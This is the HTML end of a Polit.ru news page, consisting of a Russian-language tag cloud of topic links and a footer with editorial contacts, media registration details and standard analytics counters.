  

  

  

  

  

  
  <a href="/tag/human_rights/" class="weight5">права человека</a>
  

  
  <a href="/tag/pravitelstvo/" class="weight10">правительство</a>
  

  

  
  <a href="/tag/pravo/" class="weight9">Право</a>
  

  

  
  <a href="/tag/human_rights_movement/" class="weight6">правозащитное движение</a>
  

  

  
  <a href="/tag/pravyj-sektor/" class="weight6">«Правый сектор»</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/acab/" class="weight7">преступления полицейских</a>
  

  
  <a href="/tag/prestupnost/" class="weight9">преступность</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/primorskij-kraj/" class="weight6">Приморский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/incidents/" class="weight11 force-hi">происшествия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/publ_lect/" class="weight8">публичные лекции</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/ramzan-kadyrov/" class="weight9">Рамзан Кадыров</a>
  

  
  <a href="/tag/AOS/" class="weight7">РАН</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kyrgyzstan/" class="weight7">Революция в Киргизии</a>
  

  
  <a href="/tag/redzhep-erdogan/" class="weight7">Реджеп Эрдоган</a>
  

  

  

  

  
  <a href="/tag/rejtingi/" class="weight8">рейтинги</a>
  

  

  

  
  <a href="/tag/religiya/" class="weight8">религия</a>
  

  

  

  

  

  
  <a href="/tag/army_topic/" class="weight4">Реформа армии</a>
  

  

  

  
  <a href="/tag/rzhd/" class="weight8">РЖД</a>
  

  

  

  

  

  

  

  
  <a href="/tag/ritejl/" class="weight5">ритейл</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/roskomnadzor/" class="weight8">Роскомнадзор</a>
  

  
  <a href="/tag/roskosmos/" class="weight8">Роскосмос</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rospotrebnadzor/" class="weight8">Роспотребнадзор</a>
  

  

  

  

  
  <a href="/tag/rosselhoznadzor/" class="weight6">Россельхознадзор</a>
  

  
  <a href="/tag/rossijskaya-akademiya-nauk/" class="weight8">Российская академия наук</a>
  

  

  

  

  

  

  

  
  <a href="/tag/Russia/" class="weight12 force-hi">Россия</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rostov-na-donu/" class="weight5">Ростов-на-Дону</a>
  

  
  <a href="/tag/rostovskaya-oblast/" class="weight7">Ростовская область</a>
  

  

  

  

  

  
  <a href="/tag/rpc/" class="weight8">РПЦ</a>
  

  

  

  
  <a href="/tag/rubl/" class="weight9">рубль</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/russian_nationalists/" class="weight6">русские националисты</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/rfs/" class="weight6">РФС</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/st_petersburgh/" class="weight10 force-hi">Санкт-Петербург</a>
  

  
  <a href="/tag/sankcii/" class="weight11 force-hi">санкции</a>
  

  

  

  

  

  
  <a href="/tag/saudi_arabia/" class="weight7">Саудовская Аравия</a>
  

  
  <a href="/tag/sahalin/" class="weight4">Сахалин</a>
  

  

  
  <a href="/tag/sberbank/" class="weight8">Сбербанк</a>
  

  

  
  <a href="/tag/sverdlovskaya-oblast/" class="weight6">Свердловская область</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/communications/" class="weight7">связь</a>
  

  
  <a href="/tag/telecom/" class="weight9">связь и телекоммуникации</a>
  

  
  <a href="/tag/sevastopol/" class="weight7">Севастополь</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/selskoe-hozyajstvo/" class="weight7">сельское хозяйство</a>
  

  

  

  
  <a href="/tag/separatizm/" class="weight10">сепаратизм</a>
  

  
  <a href="/tag/serbiya/" class="weight5">Сербия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-lavrov/" class="weight9">Сергей Лавров</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-sobyanin/" class="weight7">Сергей Собянин</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sergey-shoigu/" class="weight8">Сергей Шойгу</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/siriya/" class="weight11 force-hi">Сирия</a>
  

  

  

  

  

  

  
  <a href="/tag/skolkovo/" class="weight8">Сколково</a>
  

  

  

  
  <a href="/tag/slavyansk/" class="weight7">Славянск</a>
  

  

  
  <a href="/tag/committee_of_inquiry/" class="weight10 force-hi">Следственный комитет</a>
  

  
  <a href="/tag/sledstvie/" class="weight9">следствие</a>
  

  

  

  
  <a href="/tag/smartphones/" class="weight2">смартфоны</a>
  

  

  
  <a href="/tag/mass_media/" class="weight6">СМИ</a>
  

  

  

  

  

  
  <a href="/tag/sovbez-oon/" class="weight7">Совбез ООН</a>
  

  

  

  

  
  <a href="/tag/sovet-federacii/" class="weight9">Совет Федерации</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sotovaya-svyaz/" class="weight6">сотовая связь</a>
  

  

  

  
  <a href="/tag/social_network/" class="weight8">социальные сети</a>
  

  

  
  <a href="/tag/sociology/" class="weight5">социология</a>
  

  
  <a href="/tag/sociology_russia/" class="weight7">Социология в России</a>
  

  

  
  <a href="/tag/sochi/" class="weight7">Сочи</a>
  

  
  <a href="/tag/sochi_olympics/" class="weight9">Сочи 2014</a>
  

  

  

  

  

  
  <a href="/tag/spartak/" class="weight6">«Спартак»</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/spravedlivaya-rossiya/" class="weight7">«Справедливая Россия»</a>
  

  
  <a href="/tag/sputnik/" class="weight8 force-hi">спутники</a>
  

  

  

  

  
  <a href="/tag/ussr_topic/" class="weight8">СССР</a>
  

  
  <a href="/tag/stavropolskij-kraj/" class="weight6">Ставропольский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/stihijnye-bedstviya/" class="weight8">стихийные бедствия</a>
  

  
  <a href="/tag/stix/" class="weight7">Стихотворения на случай</a>
  

  

  

  
  <a href="/tag/strahovanie/" class="weight4">страхование</a>
  

  
  <a href="/tag/strelba/" class="weight9">стрельба</a>
  

  

  

  

  
  <a href="/tag/building/" class="weight7">строительство</a>
  

  

  

  

  

  

  
  <a href="/tag/courts/" class="weight11 force-hi">суды</a>
  

  
  <a href="/tag/suicid/" class="weight7">суицид</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/usa/" class="weight12 force-hi">США</a>
  

  

  

  

  

  
  <a href="/tag/tadzhikistan/" class="weight4">Таджикистан</a>
  

  
  <a href="/tag/tailand/" class="weight7">Таиланд</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/tatarstan/" class="weight6">Татарстан</a>
  

  

  

  

  

  
  <a href="/tag/theatre/" class="weight7">театр</a>
  

  

  

  
  <a href="/tag/TV/" class="weight9">телевидение</a>
  

  
  <a href="/tag/telefonnyj-terrorizm/" class="weight3">телефонный терроризм</a>
  

  

  

  

  

  

  
  <a href="/tag/terakt/" class="weight10">теракт</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/terrorizm/" class="weight11 force-hi">терроризм</a>
  

  

  
  <a href="/tag/technology/" class="weight0 macrotag">технологии</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/transportation/" class="weight9">транспорт</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/turizm/" class="weight9">туризм</a>
  

  

  

  
  <a href="/tag/turciya/" class="weight10 force-hi">Турция</a>
  

  

  
  <a href="/tag/dungeons_and_dragons/" class="weight8">тюрьмы и колонии</a>
  

  
  <a href="/tag/murder/" class="weight11 force-hi">убийство</a>
  

  

  

  

  

  

  
  <a href="/tag/uefa/" class="weight6">УЕФА</a>
  

  

  

  

  

  
  <a href="/tag/ukraine/" class="weight13 force-hi">Украина</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/trud/" class="weight5">Условия труда</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/fas/" class="weight7">ФАС</a>
  

  

  

  

  

  
  <a href="/tag/federalnaya-migracionnaya-sluzhba/" class="weight7">Федеральная миграционная служба</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/physics/" class="weight7">физика</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/finland/" class="weight6">Финляндия</a>
  

  
  <a href="/tag/fifa/" class="weight8">ФИФА</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/fondovaya-birzha/" class="weight9">фондовая биржа</a>
  

  

  

  

  

  

  
  <a href="/tag/photorep/" class="weight7">фоторепортаж</a>
  

  
  <a href="/tag/francois_hollande/" class="weight7">Франсуа Олланд</a>
  

  

  
  <a href="/tag/france/" class="weight10 force-hi">Франция</a>
  

  

  
  <a href="/tag/fsb/" class="weight9">ФСБ</a>
  

  
  <a href="/tag/fsin/" class="weight7">ФСИН</a>
  

  
  <a href="/tag/fskn/" class="weight6">ФСКН</a>
  

  

  

  

  

  

  
  <a href="/tag/soccer/" class="weight11 force-hi">футбол</a>
  

  

  

  
  <a href="/tag/habarovskij-kraj/" class="weight7">Хабаровский край</a>
  

  

  

  

  
  <a href="/tag/hakery/" class="weight8">хакеры</a>
  

  

  

  

  
  <a href="/tag/harkov/" class="weight6">Харьков</a>
  

  

  

  

  

  

  
  <a href="/tag/hillari-klinton/" class="weight7">Хиллари Клинтон</a>
  

  
  <a href="/tag/chemical_weapon/" class="weight7">химическое оружие</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hokkej/" class="weight8">хоккей</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/huliganstvo/" class="weight5">хулиганство</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/centrobank/" class="weight10">Центробанк</a>
  

  

  

  

  
  <a href="/tag/cik/" class="weight7">ЦИК</a>
  

  
  <a href="/tag/vzr/" class="weight0 force-hi macrotag">Цикл бесед &quot;Взрослые люди&quot;</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/cska/" class="weight5">ЦСКА</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/chelyabinskaya-oblast/" class="weight7">Челябинская область</a>
  

  

  

  

  

  

  

  
  <a href="/tag/chechnya/" class="weight10 force-hi">Чечня</a>
  

  

  

  

  

  
  <a href="/tag/world_cup_2018/" class="weight6">ЧМ-2018</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/shahty/" class="weight6">шахты</a>
  

  
  <a href="/tag/switzerland/" class="weight7">Швейцария</a>
  

  
  <a href="/tag/sweden/" class="weight6">Швеция</a>
  

  

  

  
  <a href="/tag/schcool/" class="weight8">школа</a>
  

  

  

  

  

  
  <a href="/tag/shpionazh/" class="weight8">шпионаж</a>
  

  

  

  

  

  
  <a href="/tag/ebola/" class="weight8">Эбола</a>
  

  

  

  

  

  
  <a href="/tag/edvard-snouden/" class="weight8">Эдвард Сноуден</a>
  

  

  

  

  
  <a href="/tag/ecology/" class="weight9">экология</a>
  

  
  <a href="/tag/economy/" class="weight10">экономика</a>
  

  

  
  <a href="/tag/ekonomicheskij-krizis/" class="weight9">экономический кризис</a>
  

  

  

  

  

  
  <a href="/tag/extremismus/" class="weight8">экстремизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/estoniya/" class="weight6">Эстония</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/south_korea/" class="weight8">Южная Корея</a>
  

  

  

  

  

  
  <a href="/tag/yukos/" class="weight10">ЮКОС</a>
  

  
  <a href="/tag/yuliya-timoshenko/" class="weight6">Юлия Тимошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nuclear_weapon/" class="weight8">ядерное оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/japan/" class="weight9">Япония</a>
  

  

  

  

  

</div>



  
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="//counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129343, Москва, проезд Серебрякова, д.2, корп.1, 9 этаж.
        <br/>
        Телефоны: +7 495 980 1893, +7 495 980 1894.
        <br/>
        <a href="/static/price.xlsx">Стоимость услуг Полит.ру</a>
                    <!-- Yandex.Metrika counter -->
                    <div style="display:none;"><script type="text/javascript">
                    (function(w, c) {
                        (w[c] = w[c] || []).push(function() {
                            try {
                                w.yaCounter5421865 = new Ya.Metrika(5421865);
                                 yaCounter5421865.clickmap(true);
                                 yaCounter5421865.trackLinks(true);

                            } catch(e) { }
                        });
                    })(window, 'yandex_metrika_callbacks');
                    </script></div>
                    <script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"
                    defer="defer"></script>
                    <noscript><div><img src="//mc.yandex.ru/watch/5421865"
                    style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                    <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/news/2016/11/22/hp_lenovo/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

